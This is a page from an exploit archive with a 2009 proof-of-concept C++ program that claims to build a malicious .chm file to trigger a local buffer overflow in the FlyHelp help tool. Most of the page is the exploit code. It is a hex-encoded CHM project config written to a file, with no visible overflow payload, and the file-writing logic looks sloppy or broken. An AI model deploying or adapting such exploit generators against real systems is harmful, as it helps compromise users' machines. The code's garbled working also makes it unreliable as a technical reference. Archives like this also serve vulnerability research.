what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FlyHelp Buffer Overflow

FlyHelp Buffer Overflow
Posted Jul 21, 2009
Authored by fl0 fl0w | Site fl0-fl0w.docspages.com

FlyHelp local buffer overflow proof of concept exploit that creates a malicious .chm file.

tags | exploit, overflow, local, proof of concept
SHA-256 | 9f5093b4a27bcce2c45b2e36498c1122830043832b4fe2c2b391cca44fc2c806

FlyHelp Buffer Overflow

Change Mirror Download
/*
<<Name >>flyhelp.cpp
FlyHelp .CHM File Buffer Overflo POC
<<Credits >>fl0 fl0w
<<Website >>http://www.sploitz.10001mb.com
*/

/*
<<DEMO >>
C:\Documents and Settings\Stefan\Desktop\New Folder1>flyhelp.exe

C:\Documents and Settings\Stefan\Desktop\New Folder1>flyhelp.exe -file test

***************************************************************************
FlyHelp .CHM File Buffer Overflo POC
Usage is flyhelp.exe -file filename
Credits fl0 fl0w
***************************************************************************
File build !

*/
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define SIZE 100000

char rawData[1471] =
{
0x3C, 0x3F, 0x78, 0x6D, 0x6C, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x22, 0x31,
0x2E, 0x30, 0x22, 0x20, 0x65, 0x6E, 0x63, 0x6F, 0x64, 0x69, 0x6E, 0x67, 0x3D, 0x22, 0x57, 0x69,
0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2D, 0x31, 0x32, 0x35, 0x32, 0x22, 0x20, 0x3F, 0x3E, 0x0D, 0x0A,
0x3C, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E, 0x3C, 0x69, 0x6E, 0x66, 0x6F,
0x3E, 0x43, 0x48, 0x4D, 0x20, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x3C, 0x2F, 0x69, 0x6E,
0x66, 0x6F, 0x3E, 0x0D, 0x0A, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x56, 0x65, 0x72, 0x73, 0x69,
0x6F, 0x6E, 0x22, 0x3E, 0x32, 0x30, 0x38, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20,
0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20,
0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F,
0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22,
0x46, 0x69, 0x6C, 0x65, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F,
0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F, 0x6E,
0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x48, 0x50, 0x22,
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F,
0x6E, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54,
0x69, 0x74, 0x6C, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C,
0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x74, 0x6F, 0x70,
0x69, 0x63, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20,
0x6E, 0x3D, 0x22, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x22, 0x3E, 0x30, 0x78, 0x34,
0x30, 0x39, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D,
0x22, 0x46, 0x75, 0x6C, 0x6C, 0x2D, 0x74, 0x65, 0x78, 0x74, 0x20, 0x73, 0x65, 0x61, 0x72, 0x63,
0x68, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,
0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4D, 0x61,
0x69, 0x6E, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x5B, 0x38, 0x30, 0x2C, 0x36, 0x30,
0x2C, 0x36, 0x34, 0x30, 0x2C, 0x34, 0x38, 0x30, 0x5D, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x72, 0x65, 0x50, 0x6F,
0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4E, 0x61, 0x76, 0x69, 0x67, 0x61, 0x74,
0x69, 0x6F, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E,
0x74, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x74, 0x65, 0x6D, 0x70, 0x2E, 0x68,
0x68, 0x63, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
0x3D, 0x22, 0x49, 0x6E, 0x64, 0x65, 0x78, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C,
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53,
0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x64, 0x76,
0x53, 0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F,
0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x61,
0x76, 0x6F, 0x72, 0x69, 0x74, 0x65, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C,
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44,
0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x54, 0x61, 0x62, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54, 0x61, 0x62, 0x73,
0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x53,
0x68, 0x6F, 0x77, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x42, 0x61, 0x63, 0x6B,
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64,
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x70, 0x42, 0x75, 0x74,
0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C,
0x70, 0x20, 0x6E, 0x3D, 0x22, 0x52, 0x65, 0x66, 0x72, 0x65, 0x73, 0x68, 0x42, 0x75, 0x74, 0x74,
0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E,
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x50, 0x72, 0x69, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74,
0x69, 0x6F, 0x6E, 0x73, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4C, 0x6F, 0x63, 0x61,
0x74, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x42, 0x75,
0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70,
0x31, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x31, 0x22, 0x3E,
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x4A, 0x75, 0x6D, 0x70, 0x31, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F,
0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75,
0x6D, 0x70, 0x32, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32,
0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E,
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x4E, 0x65, 0x78, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x50, 0x72, 0x65, 0x76,
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x79, 0x6E, 0x63,
0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x68, 0x6F, 0x77, 0x48, 0x69, 0x64, 0x65, 0x50, 0x61,
0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x43, 0x61,
0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x64, 0x50, 0x61,
0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
0x20, 0x6E, 0x3D, 0x22, 0x50, 0x61, 0x6E, 0x65, 0x57, 0x69, 0x64, 0x74, 0x68, 0x22, 0x3E, 0x3C,
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67,
0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E,
} ;

class EXPLOIT {
public:

int check (char *, char *);
void Usage (char *);
};

static int Poz = 1;
static int Neg = 0;

int i;

char Name [SIZE];
char NeWbuff [SIZE];


int main (int argc, char *argv [])

{

EXPLOIT VIDEO;
VIDEO.Usage(argv [0]);
if(argc < 2) {
VIDEO.Usage(argv [0]);
exit(0);
}
if(VIDEO.check(argv [1], "-file") == Neg) {
fprintf(stdout , " Incorect input ");
printf(" \t..Usage is %s -file filename.. \n", Name);
exit(0);
}
FILE *f;
strcpy(Name, argv [2]);
strcat(Name, " .chm ");
f = fopen (Name, "w");
assert( f != NULL);
strncpy(NeWbuff , rawData , sizeof(rawData));
fputs("FILE \"", f);
fprintf( f, " %s ", NeWbuff);
fprintf( stdout , "File build ! ");
exit(0);
getchar();
return 0;
}
int EXPLOIT::check(char *Arg_, char *_Arg)
{
if(strcmp(Arg_, _Arg) == 0)
return Poz;
return Neg;
}
void EXPLOIT::Usage(char *Name)
{
system("cls");
printf("***************************************************************************\n");
printf("FlyHelp .CHM File Buffer Overflo POC\n");
printf(" \tUsage is %s -file filename\n", Name);
fprintf(stdout , "Credits fl0 fl0w\n");
printf("***************************************************************************\n");
}

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    7 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close